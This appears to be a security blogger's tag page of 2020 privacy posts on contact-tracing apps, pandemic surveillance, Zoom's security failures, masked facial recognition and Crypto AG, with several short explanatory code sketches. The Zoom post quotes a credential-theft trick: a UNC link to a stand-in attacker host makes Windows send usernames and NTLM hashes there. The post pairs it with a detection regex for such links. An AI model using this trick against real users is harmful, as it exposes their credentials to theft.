Entries Tagged "privacy"


Me on COVID-19 Contact Tracing Apps

I was quoted in BuzzFeed:

“My problem with contact tracing apps is that they have absolutely no value,” Bruce Schneier, a privacy expert and fellow at the Berkman Klein Center for Internet & Society at Harvard University, told BuzzFeed News. “I’m not even talking about the privacy concerns, I mean the efficacy. Does anybody think this will do something useful? … This is just something governments want to do for the hell of it. To me, it’s just techies doing techie things because they don’t know what else to do.”

I haven’t blogged about this because I thought it was obvious. But from the tweets and emails I have received, it seems not.

This is a classic identification problem, and efficacy depends on two things: false positives and false negatives.

  • False positives: Any app will have a precise definition of a contact: let’s say it’s less than six feet for more than ten minutes. The false positive rate is the percentage of registered contacts that don’t result in transmission. This happens for several reasons. One, the app’s location and proximity systems — based on GPS and Bluetooth — aren’t accurate enough to register only genuine contacts; they will flag encounters that never actually met the definition. Two, the app won’t be aware of any extenuating circumstances, like walls or partitions. And three, not every contact results in transmission; the disease has some transmission rate that’s less than 100% (and I don’t know what that is).
  • False negatives: This is the rate at which the app fails to register a contact when an infection occurs. This also happens for several reasons. One, errors in the app’s location and proximity systems. Two, transmissions from people who don’t have the app (even Singapore didn’t get above a 20% adoption rate for the app). And three, not every transmission results from that precisely defined contact — the virus sometimes travels further.

Assume you take the app out grocery shopping with you and it subsequently alerts you of a contact. What should you do? It’s not accurate enough for you to quarantine yourself for two weeks. And without ubiquitous, cheap, fast, and accurate testing, you can’t confirm the app’s diagnosis. So the alert is useless.
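To see why, it helps to run the numbers. Here is a minimal sketch of the base-rate problem, in Python; every number in it is an assumption chosen for illustration, not a measured value:

    # Illustrative base-rate sketch: all numbers are assumptions, not data.
    # It estimates the chance that an app alert corresponds to a contact
    # with an infectious person (the positive predictive value).

    prevalence = 0.005        # assumed: 0.5% of encounters involve an infectious person
    sensitivity = 0.70        # assumed: the app registers 70% of genuine risky contacts
    false_alarm_rate = 0.10   # assumed: 10% of harmless encounters still trigger an alert

    true_alerts = prevalence * sensitivity
    false_alerts = (1 - prevalence) * false_alarm_rate

    ppv = true_alerts / (true_alerts + false_alerts)
    print(f"Chance an alert reflects a real risky contact: {ppv:.1%}")  # ~3.4%

Under those assumptions, roughly 97% of alerts are spurious, which is why acting on one (say, by self-quarantining) isn’t justified without confirmatory testing.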

Similarly, assume you take the app out grocery shopping and it doesn’t alert you of any contact. Are you in the clear? No, you’re not. You actually have no idea if you’ve been infected.

The end result is an app that doesn’t work. People will post their bad experiences on social media, and people will read those posts and realize that the app is not to be trusted. That loss of trust is even worse than having no app at all.

It has nothing to do with privacy concerns. The idea that contact tracing can be done with an app, and not human health professionals, is just plain dumb.

EDITED TO ADD: This Brookings essay makes much the same point.

EDITED TO ADD: This post has been translated into Spanish.

Posted on May 1, 2020 at 6:22 AM

How Did Facebook Beat a Federal Wiretap Demand?

This is interesting:

Facebook Inc. in 2018 beat back federal prosecutors seeking to wiretap its encrypted Messenger app. Now the American Civil Liberties Union is seeking to find out how.

The entire proceeding was confidential, with only the result leaking to the press. Lawyers for the ACLU and the Washington Post on Tuesday asked a San Francisco-based federal court of appeals to unseal the judge’s decision, arguing the public has a right to know how the law is being applied, particularly in the area of privacy.

[…]

The Facebook case stems from a federal investigation of members of the violent MS-13 criminal gang. Prosecutors tried to hold Facebook in contempt after the company refused to help investigators wiretap its Messenger app, but the judge ruled against them. If the decision is unsealed, other tech companies will likely try to use its reasoning to ward off similar government requests in the future.

Here’s the 2018 story. Slashdot thread.

Posted on April 29, 2020 at 12:29 PM

Global Surveillance in the Wake of COVID-19

OneZero is tracking thirty countries around the world that are implementing surveillance programs in the wake of COVID-19:

The most common form of surveillance implemented to battle the pandemic is the use of smartphone location data, which can track population-level movement down to enforcing individual quarantines. Some governments are making apps that offer coronavirus health information, while also sharing location information with authorities for a period of time. For instance, in early March, the Iranian government released an app that it pitched as a self-diagnostic tool. While the tool’s efficacy was likely low, given reports of asymptomatic carriers of the virus, the app saved location data of millions of Iranians, according to a Vice report.

One of the most alarming measures being implemented is in Argentina, where those who are caught breaking quarantine are being forced to download an app that tracks their location. In Hong Kong, those arriving in the airport are given electronic tracking bracelets that must be synced to their home location through their smartphone’s GPS signal.

Posted on April 24, 2020 at 6:02 AM

California Needlessly Reduces Privacy During COVID-19 Pandemic

This one isn’t even related to contact tracing:

On March 17, 2020, the federal government relaxed a number of telehealth-related regulatory requirements due to COVID-19. On April 3, 2020, California Governor Gavin Newsom issued Executive Order N-43-20 (the Order), which relaxes various telehealth reporting requirements, penalties, and enforcements otherwise imposed under state laws, including those associated with unauthorized access and disclosure of personal information through telehealth mediums.

Lots of details at the link.

Posted on April 16, 2020 at 10:34 AM

Contact Tracing COVID-19 Infections via Smartphone Apps

Google and Apple have announced a joint project to create a privacy-preserving COVID-19 contact tracing app. (Details, such as we have them, are here.) It’s similar to the app being developed at MIT, and similar to others being described and developed elsewhere. It’s nice seeing the privacy protections; they’re well thought out.

I was going to write a long essay about the security and privacy concerns, but Ross Anderson beat me to it. (Note that some of his comments are UK-specific.)

First, it isn’t anonymous. Covid-19 is a notifiable disease so a doctor who diagnoses you must inform the public health authorities, and if they have the bandwidth they call you and ask who you’ve been in contact with. They then call your contacts in turn. It’s not about consent or anonymity, so much as being persuasive and having a good bedside manner.

I’m relaxed about doing all this under emergency public-health powers, since this will make it harder for intrusive systems to persist after the pandemic than if they have some privacy theater that can be used to argue that the whizzy new medi-panopticon is legal enough to be kept running.

Second, contact tracers have access to all sorts of other data such as public transport ticketing and credit-card records. This is how a contact tracer in Singapore is able to phone you and tell you that the taxi driver who took you yesterday from Orchard Road to Raffles has reported sick, so please put on a mask right now and go straight home. This must be controlled; Taiwan lets public-health staff access such material in emergencies only.

Third, you can’t wait for diagnoses. In the UK, you only get a test if you’re a VIP or if you get admitted to hospital. Even so the results take 1-3 days to come back. While the VIPs share their status on twitter or facebook, the other diagnosed patients are often too sick to operate their phones.

Fourth, the public health authorities need geographical data for purposes other than contact tracing – such as to tell the army where to build more field hospitals, and to plan shipments of scarce personal protective equipment. There are already apps that do symptom tracking but more would be better. So the UK app will ask for the first three characters of your postcode, which is about enough to locate which hospital you’d end up in.

Fifth, although the cryptographers – and now Google and Apple – are discussing more anonymous variants of the Singapore app, that’s not the problem. Anyone who’s worked on abuse will instantly realise that a voluntary app operated by anonymous actors is wide open to trolling. The performance art people will tie a phone to a dog and let it run around the park; the Russians will use the app to run service-denial attacks and spread panic; and little Johnny will self-report symptoms to get the whole school sent home.

I recommend reading his essay in full. Also worth reading are this EFF essay, and this ACLU white paper.

To me, the real problems aren’t around privacy and security. The efficacy of any app-based contact tracing is still unproven. A “contact” from the point of view of an app isn’t the same as an epidemiological contact. And the ratio of app-registered contacts to actual infections is high. We would have to deal with the false positives (being close to someone else, but separated by a partition or other barrier) and the false negatives (not being close to someone else, but contracting the disease through a mutually touched object). And without cheap, fast, and accurate testing, the information from any of these apps isn’t very useful. So I agree with Ross that this is primarily an exercise in that false syllogism: Something must be done. This is something. Therefore, we must do it. It’s techies proposing tech solutions to what is primarily a social problem.

EDITED TO ADD: Susan Landau on contact tracing apps and how they’re being oversold. And Farzad Mostashari, former coordinator for health IT at the Department of Health and Human Services, on contact tracing apps.

As long as 1) not every contact results in an infection, and 2) a large percentage of people with the disease are asymptomatic and don’t realize they have it, I can’t see how this sort of app is valuable. If we had cheap, fast, and accurate testing for everyone on demand…maybe. But I still don’t think so.

EDITED TO ADD (4/15): More details from Apple and Google.

EDITED TO ADD (4/19): Apple and Google have strengthened the security and privacy of their system.

Posted on April 13, 2020 at 6:48 AM

Security and Privacy Implications of Zoom

Over the past few weeks, Zoom’s use has exploded since it became the video conferencing platform of choice in today’s COVID-19 world. (My own university, Harvard, uses it for all of its classes. Boris Johnson had a cabinet meeting over Zoom.) Over that same period, the company has been exposed for having both lousy privacy and lousy security. My goal here is to summarize all of the problems and talk about solutions and workarounds.

In general, Zoom’s problems fall into three broad buckets: (1) bad privacy practices, (2) bad security practices, and (3) bad user configurations.

Privacy first: Zoom spies on its users for personal profit. It seems to have cleaned this up somewhat since everyone started paying attention, but it still does it.

The company collects a laundry list of data about you, including user name, physical address, email address, phone number, job information, Facebook profile information, computer or phone specs, IP address, and any other information you create or upload. And it uses all of this surveillance data for profit, against your interests.

Last month, Zoom’s privacy policy contained this bit:

Does Zoom sell Personal Data? Depends what you mean by “sell.” We do not allow marketing companies, or anyone else to access Personal Data in exchange for payment. Except as described above, we do not allow any third parties to access any Personal Data we collect in the course of providing services to users. We do not allow third parties to use any Personal Data obtained from us for their own purposes, unless it is with your consent (e.g. when you download an app from the Marketplace. So in our humble opinion, we don’t think most of our users would see us as selling their information, as that practice is commonly understood.

“Depends what you mean by ‘sell.'” “…most of our users would see us as selling…” “…as that practice is commonly understood.” That paragraph was carefully worded by lawyers to permit them to do pretty much whatever they want with your information while pretending otherwise. Do any of you who “download[ed] an app from the Marketplace” remember consenting to them giving your personal data to third parties? I don’t.

Doc Searls has been all over this, writing about the surprisingly large number of third-party trackers on the Zoom website and its poor privacy practices in general.

On March 29th, Zoom rewrote its privacy policy:

We do not sell your personal data. Whether you are a business or a school or an individual user, we do not sell your data.

[…]

We do not use data we obtain from your use of our services, including your meetings, for any advertising. We do use data we obtain from you when you visit our marketing websites, such as zoom.us and zoom.com. You have control over your own cookie settings when visiting our marketing websites.

There’s lots more. It’s better than it was, but Zoom still collects a huge amount of data about you. And note that it considers its home pages “marketing websites,” which means it’s still using third-party trackers and surveillance-based advertising. (Honestly, Zoom, just stop doing it.)

Now security: Zoom’s security is at best sloppy, and malicious at worst. Motherboard reported that Zoom’s iPhone app was sending user data to Facebook, even if the user didn’t have a Facebook account. Zoom removed the feature, but its response should worry you about its sloppy coding practices in general:

“We originally implemented the ‘Login with Facebook’ feature using the Facebook SDK in order to provide our users with another convenient way to access our platform. However, we were recently made aware that the Facebook SDK was collecting unnecessary device data,” Zoom told Motherboard in a statement on Friday.

This isn’t the first time Zoom was sloppy with security. Last year, a researcher discovered that a vulnerability in the Mac Zoom client allowed any malicious website to enable the camera without permission. This seemed like a deliberate design choice: that Zoom designed its service to bypass browser security settings and remotely enable a user’s web camera without the user’s knowledge or consent. (EPIC filed an FTC complaint over this.) Zoom patched this vulnerability last year.

On 4/1, we learned that Zoom for Windows can be used to steal users’ Windows credentials.

Attacks work by using the Zoom chat window to send targets a string of text that represents the network location on the Windows device they’re using. The Zoom app for Windows automatically converts these so-called universal naming convention strings — such as \\attacker.example.com\C$ — into clickable links. In the event that targets click on those links on networks that aren’t fully locked down, Zoom will send the Windows usernames and the corresponding NTLM hashes to the address contained in the link.
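The defensive fix is straightforward: a chat client should never turn UNC strings into clickable links. Here’s a minimal sketch of that check in Python (an illustration of the mitigation, not Zoom’s actual code):

    import re

    # Match UNC-style strings such as \\host\share so they can be
    # rendered as inert text instead of clickable links.
    UNC_PATTERN = re.compile(r"\\\\[\w.-]+\\\S+")

    def linkify_safely(message: str) -> str:
        """Return the message, leaving UNC paths as plain text."""
        if UNC_PATTERN.search(message):
            # Clicking a \\host\share link can leak the Windows username
            # and NTLM hash to the named host, so don't linkify at all.
            return message
        # ... normal URL linkification would happen here ...
        return message

    print(linkify_safely(r"see \\attacker.example.com\C$"))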

On 4/2, we learned that Zoom secretly displayed data from people’s LinkedIn profiles, which allowed some meeting participants to snoop on each other. (Zoom has fixed this one.)

I’m sure lots more of these bad security decisions, sloppy coding mistakes, and random software vulnerabilities are coming.

But it gets worse. Zoom’s encryption is awful. First, the company claims that it offers end-to-end encryption, but it doesn’t. It only provides link encryption, which means everything is unencrypted on the company’s servers. From the Intercept:

In Zoom’s white paper, there is a list of “pre-meeting security capabilities” that are available to the meeting host that starts with “Enable an end-to-end (E2E) encrypted meeting.” Later in the white paper, it lists “Secure a meeting with E2E encryption” as an “in-meeting security capability” that’s available to meeting hosts. When a host starts a meeting with the “Require Encryption for 3rd Party Endpoints” setting enabled, participants see a green padlock that says, “Zoom is using an end to end encrypted connection” when they mouse over it.

But when reached for comment about whether video meetings are actually end-to-end encrypted, a Zoom spokesperson wrote, “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.”

They’re also lying about the type of encryption. On 4/3, Citizen Lab reported:

Zoom documentation claims that the app uses “AES-256” encryption for meetings where possible. However, we find that in each Zoom meeting, a single AES-128 key is used in ECB mode by all participants to encrypt and decrypt audio and video. The use of ECB mode is not recommended because patterns present in the plaintext are preserved during encryption.

The AES-128 keys, which we verified are sufficient to decrypt Zoom packets intercepted in Internet traffic, appear to be generated by Zoom servers, and in some cases, are delivered to participants in a Zoom meeting through servers in China, even when all meeting participants, and the Zoom subscriber’s company, are outside of China.

I’m okay with AES-128, but using ECB (electronic codebook) mode indicates that there is no one at the company who knows anything about cryptography.
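Citizen Lab’s point about ECB is easy to demonstrate. The following sketch (using the Python cryptography library; the key and plaintext are arbitrary test values, nothing Zoom-specific) shows that identical plaintext blocks encrypt to identical ciphertext blocks, so the structure of the plaintext leaks straight through:

    import os
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    key = os.urandom(16)                 # AES-128, as Citizen Lab observed
    plaintext = b"SIXTEEN BYTE BLK" * 2  # two identical 16-byte blocks

    encryptor = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
    ciphertext = encryptor.update(plaintext) + encryptor.finalize()

    # Under ECB, equal plaintext blocks yield equal ciphertext blocks.
    print(ciphertext[:16] == ciphertext[16:32])  # True

Any modern mode (GCM, or even CBC with random IVs) avoids this, which is why ECB is essentially never a defensible choice for media streams.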

And that China connection is worrisome. Citizen Lab again:

Zoom, a Silicon Valley-based company, appears to own three companies in China through which at least 700 employees are paid to develop Zoom’s software. This arrangement is ostensibly an effort at labor arbitrage: Zoom can avoid paying US wages while selling to US customers, thus increasing their profit margin. However, this arrangement may make Zoom responsive to pressure from Chinese authorities.

Or from Chinese programmers slipping backdoors into the code at the request of the government.

Finally, bad user configuration. Zoom has a lot of options. The defaults aren’t great, and if you don’t configure your meetings right you’re leaving yourself open to all sorts of mischief.

“Zoombombing” is the most visible problem. People are finding open Zoom meetings, classes, and events, joining them, and sharing their screens to broadcast offensive content — porn, mostly — to everyone. It’s awful if you’re the victim, and it’s a consequence of allowing any participant to share their screen.

Even without screen sharing, people are logging in to random Zoom meetings and disrupting them. Turns out that Zoom didn’t make the meeting ID long enough to prevent someone from randomly trying IDs, looking for meetings. This isn’t new; Check Point Research reported this last summer. Instead of making the meeting IDs longer or more complicated — which it should have done — Zoom enabled meeting passwords by default. Of course most of us don’t use passwords, and there are now automatic tools for finding Zoom meetings.
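The arithmetic of guessing meeting IDs is unforgiving. A back-of-the-envelope sketch (the 9-digit ID length is real; the number of live meetings is an assumption for illustration):

    # Why short numeric meeting IDs are brute-forceable.
    # The live-meeting count is an illustrative assumption.

    id_space = 10 ** 9          # 9-digit meeting IDs: a billion possibilities
    live_meetings = 1_000_000   # assumed concurrently active meetings
    guesses_per_hit = id_space / live_meetings

    print(f"One live meeting per ~{guesses_per_hit:,.0f} random guesses")  # ~1,000
    # At a modest 25 guesses per second, that's about 40 seconds per hit.
    print(f"~{guesses_per_hit / 25:.0f} seconds per discovered meeting")

Lengthening the ID, rate-limiting guesses, and requiring a password each attack a different term in that calculation; Zoom chose only the password.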

For help securing your Zoom sessions, Zoom has a good guide. Short summary: don’t share the meeting ID more than you have to, use a password in addition to a meeting ID, use the waiting room if you can, and pay attention to who has what permissions.

That’s what we know about Zoom’s privacy and security so far. Expect more revelations in the weeks and months to come. The New York Attorney General is investigating the company. Security researchers are combing through the software, looking for other things Zoom is doing and not telling anyone about. There are more stories waiting to be discovered.

Zoom is a security and privacy disaster, but until now had managed to avoid public accountability because it was relatively obscure. Now that it’s in the spotlight, it’s all coming out. (Their 4/1 response to all of this is here.) On 4/2, the company said it would freeze all feature development and focus on security and privacy. Let’s see if that’s anything more than a PR move.

In the meantime, you should either lock Zoom down as best you can, or — better yet — abandon the platform altogether. Jitsi is a distributed, free, and open-source alternative. Start your meeting here.

EDITED TO ADD: Fight for the Future is on this.

Steve Bellovin’s comments.

Meanwhile, lots of Zoom video recordings are available on the Internet. The article doesn’t have any useful details about how they got there:

Videos viewed by The Post included one-on-one therapy sessions; a training orientation for workers doing telehealth calls, which included people’s names and phone numbers; small-business meetings, which included private company financial statements; and elementary-school classes, in which children’s faces, voices and personal details were exposed.

Many of the videos include personally identifiable information and deeply intimate conversations, recorded in people’s homes. Other videos include nudity, such as one in which an aesthetician teaches students how to give a Brazilian wax.

[…]

Many of the videos can be found on unprotected chunks of Amazon storage space, known as buckets, which are widely used across the Web. Amazon buckets are locked down by default, but many users make the storage space publicly accessible either inadvertently or to share files with other people.

EDITED TO ADD (4/4): New York City has banned Zoom from its schools.

EDITED TO ADD: This post has been translated into Spanish.

Posted on April 3, 2020 at 10:10 AM

Privacy vs. Surveillance in the Age of COVID-19

The trade-offs are changing:

As countries around the world race to contain the pandemic, many are deploying digital surveillance tools as a means to exert social control, even turning security agency technologies on their own civilians. Health and law enforcement authorities are understandably eager to employ every tool at their disposal to try to hinder the virus — even as the surveillance efforts threaten to alter the precarious balance between public safety and personal privacy on a global scale.

Yet ratcheting up surveillance to combat the pandemic now could permanently open the doors to more invasive forms of snooping later.

I think the effects of COVID-19 will be more drastic than the effects of the terrorist attacks of 9/11: not only with respect to surveillance, but across many aspects of our society. And while many things that would never be acceptable during normal times are reasonable things to do right now, we need to make sure we can ratchet them back once the current pandemic is over.

Cindy Cohn at EFF wrote:

We know that this virus requires us to take steps that would be unthinkable in normal times. Staying inside, limiting public gatherings, and cooperating with medically needed attempts to track the virus are, when approached properly, reasonable and responsible things to do. But we must be as vigilant as we are thoughtful. We must be sure that measures taken in the name of responding to COVID-19 are, in the language of international human rights law, “necessary and proportionate” to the needs of society in fighting the virus. Above all, we must make sure that these measures end and that the data collected for these purposes is not re-purposed for either governmental or commercial ends.

I worry that in our haste and fear, we will fail to do any of that.

More from EFF.

Posted on March 30, 2020 at 6:32 AM

Facial Recognition for People Wearing Masks

The Chinese facial recognition company Hanwang claims it can recognize people wearing masks:

The company now says its masked facial recognition program has reached 95 percent accuracy in lab tests, and even claims that it is more accurate in real life, where its cameras take multiple photos of a person if the first attempt to identify them fails.

[…]

Counter-intuitively, training facial recognition algorithms to recognize masked faces involves throwing data away. A team at the University of Bradford published a study last year showing they could train a facial recognition program to accurately recognize half-faces by deleting parts of the photos they used to train the software.

When a facial recognition program tries to recognize a person, it takes a photo of the person to be identified, and reduces it down to a bundle, or vector, of numbers that describes the relative positions of features on the face.

[…]

Hanwang’s system works for masked faces by trying to guess what all the faces in its existing database of photographs would look like if they were masked.
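That “vector of numbers” is a face embedding, and the recognition step reduces to comparing embeddings. Here’s a generic sketch of that comparison (cosine similarity with a made-up threshold; it illustrates the standard technique, not Hanwang’s system):

    import numpy as np

    def cosine_similarity(a: np.ndarray, b: np.ndarray) -> float:
        """Similarity between two face-embedding vectors."""
        return float(np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b)))

    rng = np.random.default_rng(0)
    enrolled = rng.normal(size=128)                     # stored database embedding
    probe = enrolled + rng.normal(scale=0.1, size=128)  # new photo, same person

    THRESHOLD = 0.8  # assumed decision threshold
    score = cosine_similarity(enrolled, probe)
    print(f"similarity={score:.3f}, match={score > THRESHOLD}")

Training on masked faces, as described above, amounts to learning embeddings that depend only on the unoccluded upper half of the face; the comparison step itself doesn’t change.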

Posted on March 25, 2020 at 6:33 AM

Emergency Surveillance During COVID-19 Crisis

Israel is using emergency surveillance powers to track people who may have COVID-19, joining China and Iran in using mass surveillance in this way. I believe pressure will increase to leverage existing corporate surveillance infrastructure for these purposes in the US and other countries. With that in mind, the EFF has some good thinking on how to balance public safety with civil liberties:

Thus, any data collection and digital monitoring of potential carriers of COVID-19 should take into consideration and commit to these principles:

  • Privacy intrusions must be necessary and proportionate. A program that collects, en masse, identifiable information about people must be scientifically justified and deemed necessary by public health experts for the purpose of containment. And that data processing must be proportionate to the need. For example, maintenance of 10 years of travel history of all people would not be proportionate to the need to contain a disease like COVID-19, which has a two-week incubation period.
  • Data collection based on science, not bias. Given the global scope of communicable diseases, there is historical precedent for improper government containment efforts driven by bias based on nationality, ethnicity, religion, and race — rather than facts about a particular individual’s actual likelihood of contracting the virus, such as their travel history or contact with potentially infected people. Today, we must ensure that any automated data systems used to contain COVID-19 do not erroneously identify members of specific demographic groups as particularly susceptible to infection.
  • Expiration. As in other major emergencies in the past, there is a hazard that the data surveillance infrastructure we build to contain COVID-19 may long outlive the crisis it was intended to address. The government and its corporate cooperators must roll back any invasive programs created in the name of public health after crisis has been contained.
  • Transparency. Any government use of “big data” to track virus spread must be clearly and quickly explained to the public. This includes publication of detailed information about the information being gathered, the retention period for the information, the tools used to process that information, the ways these tools guide public health decisions, and whether these tools have had any positive or negative outcomes.
  • Due Process. If the government seeks to limit a person’s rights based on this “big data” surveillance (for example, to quarantine them based on the system’s conclusions about their relationships or travel), then the person must have the opportunity to timely and fairly challenge these conclusions and limits.

Posted on March 20, 2020 at 6:25 AM

More on Crypto AG

One follow-on to the story of Crypto AG being owned by the CIA: this interview with a Washington Post reporter. The whole thing is worth reading or listening to, but I was struck by these two quotes at the end:

…in South America, for instance, many of the governments that were using Crypto machines were engaged in assassination campaigns. Thousands of people were being disappeared, killed. And I mean, they’re using Crypto machines, which suggests that the United States intelligence had a lot of insight into what was happening. And it’s hard to look back at that history now and see a lot of evidence of the United States going to any real effort to stop it or at least or even expose it.

[…]

To me, the history of the Crypto operation helps to explain how U.S. spy agencies became accustomed to, if not addicted to, global surveillance. This program went on for more than 50 years, monitoring the communications of more than 100 countries. I mean, the United States came to expect that kind of penetration, that kind of global surveillance capability. And as Crypto became less able to deliver it, the United States turned to other ways to replace that. And the Snowden documents tell us a lot about how they did that.

Posted on March 6, 2020 at 7:48 AM
